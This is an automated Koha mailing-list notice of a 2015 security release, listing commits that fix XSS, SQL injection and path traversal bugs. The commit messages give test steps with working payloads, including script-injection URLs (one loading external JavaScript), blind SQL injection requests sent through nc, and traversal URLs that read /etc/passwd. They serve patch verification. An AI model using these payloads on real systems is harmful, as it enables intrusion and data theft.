[koha-commits] main Koha release repository branch 3.18.x updated. v3.18.07-65-ga55fd07
Git repo owner
gitmaster at git.koha-community.org
Tue Jun 23 10:57:55 CEST 2015
This is an automated email from the git hooks/post-receive script. It was
generated because a ref change was pushed to the repository containing
the project "main Koha release repository".
The branch, 3.18.x has been updated
via a55fd078e907209fb6b588372814909f7e478fab (commit)
via e4ec3edf8a952a371a57e9bd6fb1cb2d7956322d (commit)
via 814f22e7947bc36a28ebf96418bfce6363414677 (commit)
via adc35d736e676746402c5cce5c9c3fe8af68fb01 (commit)
via 3e86cb1711dc4bb95c3f3258621fb5b2552ae771 (commit)
via b847e4e6d111d3e5e6e115d6f6bd290ef124e13b (commit)
via 5de675274633eefed59b95ae3176afcce2c7801d (commit)
via e21bf78b8b073d568998da32acb64cae9d4f4edd (commit)
via 308c4c4d4685e05f6d6e763bfa785d78f230010b (commit)
via eb964ffc9c9974169b4056a8fa937c65a35d8a1d (commit)
via 51cd2262c1548c8adaf213d1160d36dd3c1b1980 (commit)
via 794fb09fac40408e12504fb67337299e0b30abe9 (commit)
via 96047dba2c8f97e5582277b88e047534babe1761 (commit)
via 1cc1a9588a26eca84dd4014fde8454107598eb8e (commit)
via f462209e86e30e8ea23da67fb367c77c6d33be88 (commit)
via 5b03b9716b762a1930aa5d298a163fef7fb76992 (commit)
via 358e8e889d8a02d55210d353cd01bbf35d1ddc15 (commit)
via 611df7517a2f1fa58c6780463ff56253d908a23d (commit)
via 0cba81194f86b1b7fbea9d2ab48fe8c995a3c247 (commit)
via a1e0768ceb728f0019086050837884d29e498dfe (commit)
from bea822e6333ea3c7038b26619a0b75a62d5e6496 (commit)
Those revisions listed above that are new to this repository have
not appeared on any other notification email; so we list those
revisions in full, below.
- Log -----------------------------------------------------------------
commit a55fd078e907209fb6b588372814909f7e478fab
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 20:27:09 2015 +1200
Revert "Bug 13815 - plack loose CGI qw(-utf8) flag creating incorrect utf-8 encoding everywhere"
This reverts commit af127c124f1575a96cc3efca7eff0ef9135e88e6.
Oops.
commit e4ec3edf8a952a371a57e9bd6fb1cb2d7956322d
Merge: bea822e 814f22e
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 13:41:22 2015 +1200
Merge branch 'security-3.18.x' into rmaint-3.18.x
commit 814f22e7947bc36a28ebf96418bfce6363414677
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 13:40:56 2015 +1200
Increment version for 3.18.8 release
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit adc35d736e676746402c5cce5c9c3fe8af68fb01
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 13:28:38 2015 +1200
Update release notes for 3.18.8 release
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 3e86cb1711dc4bb95c3f3258621fb5b2552ae771
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 12:37:09 2015 +1200
Bug 14423 - tab characters in auth_subfields_structure
commit b847e4e6d111d3e5e6e115d6f6bd290ef124e13b
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 09:35:07 2015 +0000
Bug 14423 : Multiple XSS bugs in suggestion.pl
To test
1/ Hit a url like http://localhost:8081/cgi-bin/koha/suggestion/suggestion.pl?author=%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&accepteddate_to=
2/ Notice alert box(es)
3/ Apply patch
4/ Reload and notice alert is gone
Repeat for
collection_title
copyrightdate
isbn
manageddate_from
manageddate_to
publishercode
suggesteddate_from
suggesteddate_to
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 5de675274633eefed59b95ae3176afcce2c7801d
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 09:20:51 2015 +0000
Bug 14423 : Multiple XSS vulnerabilities in serials-search
To test
1/ Hit a url like http://localhost:8081/cgi-bin/koha/serials/serials-search.pl?bookseller_filter=%22%22%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&searched=1&title_filter=
2/ Notice alert boxes
3/ Apply patch
4/ Reload, notice fixed
Repeat for
callnumber_filter
EAN_filter
ISSN_filter
publisher_filter
title_filter
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit e21bf78b8b073d568998da32acb64cae9d4f4edd
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 09:01:32 2015 +0000
Bug 14423 : XSS bugs in catalogue search
To test
1/ hit a url like http://localhost:8081/cgi-bin/koha/catalogue/search.pl?limit=%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice alert boxes
3/ Apply patch
4/ Reload url, no alerts
5/ Check search still works
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 308c4c4d4685e05f6d6e763bfa785d78f230010b
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 08:46:40 2015 +0000
Bug 14423 : XSS issues in marc_subfields_structure
1/ Hit a url like http://localhost:8081/cgi-bin/koha/admin/marc_subfields_structure.pl?op=add_form&tagfield=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice all the alert boxes
3/ Apply patch
4/ Reload page, no more alerts
5/ Test functionality still works
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit eb964ffc9c9974169b4056a8fa937c65a35d8a1d
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 08:33:13 2015 +0000
Bug 14423 XSS bug in auth_subfields_structure
1/ Hit a url like http://localhost:8081/cgi-bin/koha/admin/auth_subfields_structure.pl?op=add_form&authtypecode=%27%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&tagfield=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice a ton of alert boxes pop up
3/ Apply patch
4/ Reload url, no longer get any alerts
5/ Test fuctionality still works
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 51cd2262c1548c8adaf213d1160d36dd3c1b1980
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 08:18:20 2015 +0000
Bug 14423 : XSS bug in lateorders
1/ hit a url like http://localhost:8081/cgi-bin/koha/acqui/lateorders.pl?delay=<script>alert('oh noes')</script>&estimateddeliverydatefrom
2/ Not you get an alert box
3/ Apply patch notice it is fixed
4/ Test functionality still works
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 794fb09fac40408e12504fb67337299e0b30abe9
Author: Chris <chris at bigballofwax.co.nz>
Date: Sun Jun 21 08:10:20 2015 +0000
Bug 14423 : XSS in authorities-home
To test:
1/ Hit a url like http://localhost:8081/cgi-bin/koha/authorities/authorities-home.pl?op=do_search&type=intranet&marclist=mainentry&and_or=and&operator=contains&value=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice you get 3 alert boxes
3/ Apply patch
4/ Hit the url again, no js
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 96047dba2c8f97e5582277b88e047534babe1761
Author: Jonathan Druart <jonathan.druart at koha-community.org>
Date: Mon Jun 22 10:56:26 2015 +0200
Bug 14426: Escape or use placeholders for sql parameters
Does this patch enough to prevent sql injection in borrowers_out.pl?
====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')"
| nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')"
| nc testbox 9002
====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a"
| nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b"
| nc testbox 9002
====================================================================
Signed-off-by: Chris Cormack <chrisc at catalyst.net.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit 1cc1a9588a26eca84dd4014fde8454107598eb8e
Author: Chris <chris at bigballofwax.co.nz>
Date: Mon Jun 22 05:23:52 2015 +0000
Bug 14408 Path Traversal error
Counter counter patch
Please test well, including with the null byte %00, this uses a whitelisting to only allow files ending with .tt
and not allowing ../etc
Note the previous patch tries to protect against /etc/passwd
but //etc/passwd is now vulnerable. I do think a whitelist is safer than trying to do a blacklist
/cgi-bin/koha/svc/virtualshelves/search
/cgi-bin/koha/svc/members/search
Are vulnerable
To test:
1/ Hit /cgi-bin/koha/svc/members/search?template_path=members/tables/members_results.tt
Notice you get a valid JSON response
2/ Hit
/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
(You may have add more ..%2f or remove them to get the correct path)
Notice you can see the contents of the /etc/passwd file
3/ Hit
/cgi-bin/koha/svc/members/search?template_path=test%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4/ Apply patch
5/ Hit the first url again, notice it still works
6/ Hit the second url notice it now errors with a file not found
7/ Hit the third url notice it now errors with a file not found
Repeat for the other script also
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83 at web.de>
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit f462209e86e30e8ea23da67fb367c77c6d33be88
Author: Liz Rea <wizzyrea at gmail.com>
Date: Tue Jun 23 09:57:18 2015 +1200
Revert "Bug 14408 Path traversal vulnerability"
This reverts commit a1e0768ceb728f0019086050837884d29e498dfe.
commit 5b03b9716b762a1930aa5d298a163fef7fb76992
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date: Fri Jun 19 11:41:45 2015 +1200
Bug 14418 : More XSS vulnerabilities in opac-shelves.pl
To test:
1/ Hit a url like
/cgi-bin/koha/opac-shelves.pl?viewshelf=7&op=modif&display="><script>alert('oh
noes')</script> Where the id is a valid shelf id
2/ Notice the js is executed
3/ Apply patch
4/ Reload page
5/ Notice input is now escaped on display
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
Tested in Debian, couldn't reproduce the alert in Iceweasel, but in
Chromium. Patch fixes it.
commit 358e8e889d8a02d55210d353cd01bbf35d1ddc15
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date: Fri Jun 19 11:30:22 2015 +1200
Bug 14418 : XSS flaw in opac-shelves.pl
To test:
1/ Create a list and add at least one item to it
2/ Hit a url like http://192.168.2.18/cgi-bin/koha/opac-shelves.pl?viewshelf=7&sort=author&direction=%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
Where the shelf id is the number of the list you created, notice the js is executed
3/ Apply the patch
4/ Reload the page notice the js is now escaped
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
commit 611df7517a2f1fa58c6780463ff56253d908a23d
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date: Fri Jun 19 09:25:22 2015 +1200
Bug 14418 XSS Vulnerabilities
Fix for /cgi-bin/koha/opac-search.pl
To test
1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script
src='http://cst.sba-research.org/x.js'/>&q=a
2/ Notice the js is executed
3/ Apply patch
4/ Reload page, notice it is no longer executed
5/ Test the rss links work still
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
Confirmed bug and that the patch fixes it.
commit 0cba81194f86b1b7fbea9d2ab48fe8c995a3c247
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date: Fri Jun 19 08:35:07 2015 +1200
Bug 14412 : SQL injection possible
There is a SQL Injection vulnerability in the
/cgi-bin/koha/opac-tags_subject.pl script.
By manipulating the variable 'number', the database can be accessed
via time-based blind injections.
The following string serves as an example:
/cgi-bin/koha/opac-tags_subject.pl?number=1+PROCEDURE+ANALYSE+(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
To exploit the vulnerability, no authentication is needed
To test
1/ Turn on mysql query logging
2/ Hit /cgi-bin/koha/opac-tags_subject.pl?number=1+PROCEDURE+ANALYSE+(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
3/ Check the logs notice something like
SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT 1
PROCEDURE ANALYSE
(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
4/ Apply patch
5/ Hit the url again
6/ Notice the log now only has
SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT 1
Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
Confirmed the problem and the fix for it.
Signed-off-by: Liz Rea <wizzyrea at gmail.com>
commit a1e0768ceb728f0019086050837884d29e498dfe
Author: Jonathan Druart <jonathan.druart at koha-community.org>
Date: Fri Jun 19 10:12:45 2015 +0200
Bug 14408 Path traversal vulnerability
/cgi-bin/koha/svc/virtualshelves/search
/cgi-bin/koha/svc/members/search
Are vulnerable
To test:
1/ Hit /cgi-bin/koha/svc/members/search?template_path=members/tables/members_results.tt
Notice you get a valid JSON response
2/ Hit
/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
(You may have add more ..%2f or remove them to get the correct path)
Notice you can see the contents of the /etc/passwd file
3/ Hit
/cgi-bin/koha/svc/members/search?template_path=test%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4/ Apply patch
5/ Hit the first url again, notice it still works
6/ Hit the second url notice it now errors with a file not found
7/ Hit the third url notice it now errors with a file not found
Repeat for the other script also
Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
Signed-off-by: Kyle M Hall <kyle at bywatersolutions.com>
-----------------------------------------------------------------------
Summary of changes:
C4/Auth.pm | 3 +
C4/Koha.pm | 2 +-
installer/data/mysql/updatedatabase.pl | 7 +-
.../prog/en/includes/authorities-search.inc | 6 +-
.../prog/en/modules/acqui/lateorders.tt | 6 +-
.../en/modules/admin/auth_subfields_structure.tt | 28 +--
.../en/modules/admin/marc_subfields_structure.tt | 28 +--
.../prog/en/modules/catalogue/results.tt | 6 +-
.../prog/en/modules/serials/serials-search.tt | 26 +-
.../prog/en/modules/suggestion/suggestion.tt | 22 +-
.../opac-tmpl/bootstrap/en/modules/opac-results.tt | 4 +-
.../opac-tmpl/bootstrap/en/modules/opac-shelves.tt | 4 +-
kohaversion.pl | 2 +-
misc/plack/koha.psgi | 12 -
...e_notes_3_18_2.txt => release_notes_3_18_8.txt} | 250 ++++++++++----------
opac/opac-tags_subject.pl | 4 +-
reports/borrowers_out.pl | 41 ++--
17 files changed, 228 insertions(+), 223 deletions(-)
copy misc/release_notes/{release_notes_3_18_2.txt => release_notes_3_18_8.txt} (51%)
hooks/post-receive
--
main Koha release repository
More information about the koha-commits
mailing list